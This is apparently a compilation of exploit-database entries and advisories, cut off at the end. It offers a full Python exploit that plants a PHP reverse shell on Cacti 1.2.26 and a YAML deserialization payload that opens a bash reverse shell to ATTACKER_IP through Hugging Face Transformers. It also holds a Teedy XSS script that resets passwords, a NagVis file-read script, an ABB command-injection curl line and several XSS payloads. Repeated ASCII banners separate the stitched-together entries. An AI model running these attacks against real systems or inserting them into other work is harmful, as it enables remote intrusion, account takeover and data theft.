--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
http://192.168.73.31:7226/servlets/MapServices?cmd=<script>alert(document.cookie)</script>&id=251
http://192.168.73.31:7226/servlets/MapServices?cmd=readScheduleConfig&id=<script>confirm(document.cookie)</script>
ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The application suffers from cleartext transmission and storage of
sensitive information in a Cookie. This includes the globals parameter, where
authdata contains base64-encoded credentials: in the sample cookie below,
YWFtdXNlcjpkZWZhdWx0 decodes to aamuser:default, a username:password pair
(base64 is an encoding, not encryption). A remote attacker positioned on the
network path can intercept the HTTP Cookie, including those credentials,
through a man-in-the-middle attack whenever the session is carried over plain
HTTP, potentially compromising user accounts and sensitive data.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5895
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5895.php
CVE ID: CVE-2024-51546
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-51546
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
Cookie: PHPSESSID=xxx; context1=xxx; globals={"currentUser":{"username":"aamuser","authdata":"YWFtdXNlcjpkZWZhdWx0","mangledAuth":"bXVidmZnO2Vmc3Z0Ym45YjczMzY2ODo6MjQyODQ7Mg==","loginExpirySeconds":0},"loggedIn":true,"lang":"en"}; cod=5.27; connect.sid=xxx; csd=44
# Exploit Title: Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 06/01/2025
# Exploit Author: D3Ext
# Vendor Homepage: https://cacti.net/
# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip
# Version: 1.2.26
# Tested on: Kali Linux 2024
# CVE: CVE-2024-25641
#!/usr/bin/python3
import argparse
import base64
import gzip
import os
import random
import string
import sys
import time

import requests
from bs4 import BeautifulSoup
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
def get_random_string(length):
    """Return a string of *length* random lowercase ASCII letters.

    Letters are drawn independently with replacement from ``string.ascii_lowercase``
    using the non-cryptographic ``random`` module.
    """
    # random.choices draws one letter per position, with replacement.
    return "".join(random.choices(string.ascii_lowercase, k=length))
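def check_version(url_to_check):
    """Heuristically decide whether the target runs Cacti 1.2.26.

    Fetches ``url_to_check`` (the caller passes ``<webroot>/CHANGELOG``) and
    treats the page as a match when it contains "Cacti CHANGELOG" and a
    "1.2.26" entry but no "1.2.27" entry. A removed CHANGELOG, a 404 page or a
    customised build all read as a mismatch, so the result is a hint only.

    Returns True on a match, False otherwise (the original returned None in
    both cases, so the caller's ``check == False`` test could never fire).
    Network errors from ``requests`` propagate to the caller.
    """
    response = requests.get(url_to_check, timeout=30).text
    looks_like_1_2_26 = (
        "Cacti CHANGELOG" in response
        and "1.2.26" in response
        and "1.2.27" not in response
    )
    if looks_like_1_2_26:
        print("[+] Version seems to be 1.2.26")
        return True
    print("[-] Version doesn't seem to be 1.2.26 (CHANGELOG missing or different)")
    return False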
# Main function
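if __name__ == '__main__':
    p = argparse.ArgumentParser(description="CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE")
    p.add_argument('--url', help="URL of the Cacti web root", required=True)
    p.add_argument('--user', help="username to log in", required=True)
    p.add_argument('--password', help="password of the username", required=True)
    p.add_argument('--lhost', help="local host to receive the reverse shell", required=True)
    p.add_argument('--lport', help="local port to receive the reverse shell", required=True)
    p.add_argument('--verbose', help="enable verbose", action='store_true', default=False, required=False)
    # Parse CLI arguments
    parser = p.parse_args()
    url = parser.url.rstrip("/")
    username = parser.user
    password = parser.password
    lhost = parser.lhost
    lport = parser.lport
    verbose = parser.verbose
    # lport is spliced into PHP source as a bare literal ("$port = <lport>;"),
    # so anything but digits would at best break the payload, at worst alter it.
    if not lport.isdigit():
        print("[-] --lport must be a numeric TCP port")
        sys.exit(1)
    print("CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE\n")
    # check if versions match (heuristic: looks for the 1.2.26 CHANGELOG)
    print("[*] Checking Cacti version...")
    time.sleep(0.5)
    check = check_version(url + "/CHANGELOG")
    # only an explicit False aborts; None means "no verdict"
    if check is False:
        sys.exit(1)
    req = requests.Session()
    if verbose:
        print("[*] Capturing CSRF token...")
    r = req.get(url)
    # extract CSRF token: the hidden __csrf_magic input on the login form
    soup = BeautifulSoup(r.text, 'html.parser')
    html_parser = soup.find('input', {'name': '__csrf_magic'})
    if html_parser is None or not html_parser.get('value'):
        print("[-] Could not find the __csrf_magic token on " + url + " (not a Cacti login page?)")
        sys.exit(1)
    csrf_token = html_parser.get('value')
    if verbose:
        print("[+] CSRF token: " + csrf_token)
    print("[*] Logging in on " + url + "/index.php")
    # define login post data
    login_data = {
        '__csrf_magic': csrf_token,
        'action': 'login',
        'login_username': username,
        'login_password': password,
        'remember_me': 'on'
    }
    # send login request
    r = req.post(url + "/index.php", data=login_data)
    # check success
    if 'Logged in' in r.text:
        print("[+] Successfully logged in as " + username)
    else:
        print("[-] An error has ocurred while logging in as " + username)
        sys.exit(1)
    # generate random filename
    random_name = get_random_string(10)
    random_filename = random_name + ".php"
    # pentestmonkey-style PHP reverse shell; lands as resource/<random>.php on the target
    payload = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '""" + lhost + """';
$port = """ + lport + """;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>"""
    # generate payload. The package carries its own public key and
    # 'trust_signer=on' makes Cacti accept it, so a throwaway RSA key
    # generated here is all the "signing" that is needed.
    print("[*] Generating malicious payload...")
    keypair = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = keypair.public_key().public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo)
    file_signature = keypair.sign(payload.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256())
    b64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
    b64_file_signature = base64.b64encode(file_signature).decode('utf-8')
    b64_public_key = base64.b64encode(public_key).decode('utf-8')
    data = """<xml>
<files>
<file>
<name>resource/""" + random_filename + """</name>
<data>""" + b64_payload + """</data>
<filesignature>""" + b64_file_signature + """</filesignature>
</file>
</files>
<publickey>""" + b64_public_key + """</publickey>
<signature></signature>
</xml>"""
    # the package-level signature covers the XML with an empty <signature/> element
    signature = keypair.sign(data.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256())
    final_data = data.replace("<signature></signature>", "<signature>" + base64.b64encode(signature).decode('utf-8') + "</signature>").encode('utf-8')
    # write gzip data
    gz_name = random_filename + ".gz"
    with open(gz_name, "wb") as f:
        f.write(gzip.compress(final_data))
    print("[+] Malicious GZIP: " + gz_name)
    try:
        # define post data (preview step: Cacti unpacks the package and lists its files)
        post_data = {
            '__csrf_magic': csrf_token,
            'trust_signer': 'on',
            'save_component_import': 1,
            'action': 'save'
        }
        # upload file
        print("[*] Uploading GZIP file...")
        with open(gz_name, 'rb') as gz:
            r = req.post(url + "/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on", data=post_data, files={'import_file': gz})
        print("[+] Successfully uploaded GZIP file")
        time.sleep(0.5)
        print("[*] Validating success...")
        # The preview lists each packaged file as an <input> whose 'title' is the
        # absolute destination path. Match on the "/resource/<name>" suffix instead
        # of a hard-coded /var/www/html/cacti prefix so other install paths work.
        soup = BeautifulSoup(r.text, 'html.parser')
        wanted_suffix = "/resource/" + random_filename
        file_input = None
        for candidate in soup.find_all('input'):
            if candidate.get('title', '').endswith(wanted_suffix):
                file_input = candidate
                break
        if file_input is None or not file_input.get('id'):
            print("[-] No preview entry for " + wanted_suffix + " - upload rejected (permissions, or target already patched?)")
            sys.exit(1)
        file_id = file_input.get('id')
        post_data = {
            '__csrf_magic': csrf_token,
            'trust_signer': 'on',
            'data_source_profile': 1,
            'remove_orphans': 'on',
            'replace_svalues': 'on',
            file_id: 'on',
            'save_component_import': 1,
            'preview_only': '',
            'action': 'save',
        }
        # confirm the import: this is the request that writes resource/<random>.php
        r = req.post(url + "/package_import.php?header=false", data=post_data)
        print("[+] Success!")
    finally:
        # remove payload file whether or not the import went through
        os.remove(gz_name)
    time.sleep(0.5)
    print("[*] Triggering reverse shell by sending GET request to " + url + "/resource/" + random_filename)
    time.sleep(0.2)
    print("[+] Check your netcat listener")
    # The PHP shell keeps the HTTP response open for as long as the shell lives
    # (unless pcntl_fork() let it daemonise), so bound the read and treat a
    # read timeout as the expected outcome instead of hanging here forever.
    try:
        req.get(url + "/resource/" + random_filename, timeout=(10, 5))
    except requests.exceptions.ReadTimeout:
        pass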
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392
# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
# POC
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --orig_config_path transformers_exploit.yaml [remaining arguments truncated in the original listing: the output directory and the task, see the note below]
# Note: dummy_checkpoint.pt can be an empty file, dummy_output an empty directory, and "task" any of the options mentioned in the script. The YAML is deserialised (and the payload executed) before the checkpoint is ever inspected, which is why the placeholders do not need to be valid.
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
# Vendor Homepage: https://teedy.io/
# Software Link: https://github.com/Tomblib0/Teedy
# Version: 1.11
# Tested on: Linux
# CVE : CVE-2024-46278
A stored XSS is triggered when a user downloads (renders) an attacker-uploaded HTML file.
Because the script runs in the victim's authenticated session, an attacker can take over a Teedy administrator's account with a few clicks: the payload below simply sets a new password for whoever is viewing the file.
Login as an attacker’s account.
Upload this file with an HTML content type. Adjust the fetch() URL (the Teedy origin) and the new password as needed. Note that Origin, Referer and Cookie are forbidden request headers that the browser sets itself, so values placed in the `headers` object for them are ignored; the session cookie is attached automatically because the request is same-origin.
```
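<script>
// Stored-XSS payload: when a logged-in user (e.g. the admin) "downloads" this
// HTML file, the script runs in the Teedy origin and changes the VIEWER's own
// password via POST /api/user.
//
// Only same-origin state matters here. fetch() silently drops "forbidden"
// request headers (Cookie, Origin, Referer, Accept-Encoding, Sec-* ...), so the
// original's attempt to set them was a no-op; the browser attaches the session
// cookie itself because the request is same-origin (credentials: 'same-origin'
// is the default, spelled out below). Adjust TEEDY_ORIGIN and NEW_PASSWORD.
const TEEDY_ORIGIN = 'http://localhost:8080';
const NEW_PASSWORD = 'superSecure2';
const requestOptions = {
  method: 'POST',
  credentials: 'same-origin',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Accept': 'application/json, text/plain, */*'
  },
  body: 'password=' + encodeURIComponent(NEW_PASSWORD) +
        '&passwordconfirm=' + encodeURIComponent(NEW_PASSWORD)
};
fetch(TEEDY_ORIGIN + '/api/user', requestOptions)
  .then(response => {
    if (!response.ok) {
      throw new Error('Network response was not ok');
    }
    document.write('<h1>Your account was taken over by the attacker LOL</h1>');
    return response.json();
  })
  .then(data => console.log(data))
  .catch(error => console.error('There was a problem with your fetch operation:', error));
</script>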
```
Login with another account. eg. admin
Click on the file uploaded by the attacker and select Download this file.
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
blind command injection vulnerability. Input passed to the serial and ManufactureDate
POST parameters is not properly sanitized, allowing attackers to execute arbitrary
shell commands on the system. While factory test scripts included in the upgrade
bundle are typically deleted, a short window for exploitation exists when the device
is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5894
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/factorySetSerialNum.php \
> -d "serial=;sleep 2&ManufactureDate=;sleep 3"
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
# Date: 03/12/2024
# Exploit Author: David Rodríguez a.k.a. xerosec
# Vendor Homepage: https://www.nagvis.org/
# Software Link: https://www.nagvis.org/downloads/archive
# Version: 1.9.33
# Tested on: Linux
# CVE: CVE-2022-46945
import requests
import argparse
import json
from urllib.parse import urljoin
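def authenticate(target_url, username, password):
    """Log in to NagVis and return the session cookies as a ``Cookie`` header value.

    Posts the login form at ``/nagvis/frontend/nagvis-js/index.php``. On
    success returns ``"name=value; name2=value2"`` built from every cookie the
    server set during the login exchange (redirects included); on failure
    prints a diagnostic and returns ``None``.

    The original echoed the raw ``Set-Cookie`` header back as the ``Cookie``
    value, which forwards attributes such as ``Path=/`` and ``HttpOnly`` (and
    the comma-joined blob ``requests`` produces for several ``Set-Cookie``
    headers) to the server as if they were cookies.

    NOTE(review): HTTP 200 plus a fresh session cookie is only a weak success
    signal; NagVis may set one on a failed login too, in which case the file
    read simply fails later.
    """
    url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
    headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
    data = {"_username": username, "_password": password, "submit": "Login"}
    session = requests.Session()
    try:
        response = session.post(url, headers=headers, data=data, timeout=30)
    except requests.RequestException as e:
        print(f"[✘] Request error: {e}")
        return None
    cookies = session.cookies.get_dict()
    if response.status_code == 200 and cookies:
        print("[✔] Authentication successful.")
        return "; ".join(f"{name}={value}" for name, value in cookies.items())
    print(f"[✘] Authentication failed. Status code: {response.status_code}")
    return None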
def exploit(target_url, session_cookie, file_path):
    """Read ``file_path`` from the NagVis host through the getHoverUrl AJAX action.

    ``mod=General&act=getHoverUrl`` takes a ``url[]`` parameter that the server
    presumably fetches and echoes back; passing ``file://<path>`` therefore
    returns local file contents (CVE-2022-46945). ``session_cookie`` is sent
    verbatim as the ``Cookie`` header. Output goes to ``display_file_content``.
    """
    endpoint = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
    request_headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
    query = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
    try:
        reply = requests.get(endpoint, headers=request_headers, params=query)
        if reply.status_code == 200:
            print("[✔] Exploitation successful. File content:\n")
            display_file_content(reply.text)
            return
        print(f"[✘] Exploitation failed. Status code: {reply.status_code}")
    except Exception as e:
        print(f"[✘] Request error: {e}")
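def display_file_content(raw_response):
    """Print the file contents carried in a getHoverUrl JSON reply.

    ``raw_response`` is expected to be a JSON list whose first element is an
    object with a ``code`` member holding the fetched file. ``json.loads``
    already resolves every JSON escape, so the text is printed as-is. The
    original additionally ran the text through ``unicode_escape``, which
    turned every non-ASCII character into mojibake and re-interpreted literal
    backslash sequences inside the file (common in scripts and configs).

    Prints a diagnostic instead of raising on malformed JSON or an unexpected
    structure.
    """
    try:
        data = json.loads(raw_response)
    except json.JSONDecodeError as jde:
        print(f"[✘] JSON decoding error: {jde}")
        return
    if isinstance(data, list) and data and isinstance(data[0], dict) and "code" in data[0]:
        print(str(data[0]["code"]).strip())
    else:
        print("[✘] Unexpected JSON structure.")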
def main():
    """CLI entry point: authenticate, then read the requested file."""
    cli = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
    cli.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
    cli.add_argument("-u", "--username", required=True, help="Username for authentication")
    cli.add_argument("-p", "--password", required=True, help="Password for authentication")
    cli.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
    opts = cli.parse_args()
    cookie = authenticate(opts.target, opts.username, opts.password)
    if not cookie:
        return
    exploit(opts.target, cookie, opts.file)


if __name__ == "__main__":
    main()
# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
reflected cross-site scripting vulnerability in the 'title' GET parameter.
Input is not properly sanitized before being returned to the user, allowing
the execution of arbitrary HTML/JS code in a user's browser session in the
context of the affected site. While the factory test scripts included in the
upgrade bundle are typically deleted, a short window for exploitation exists
when the device is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
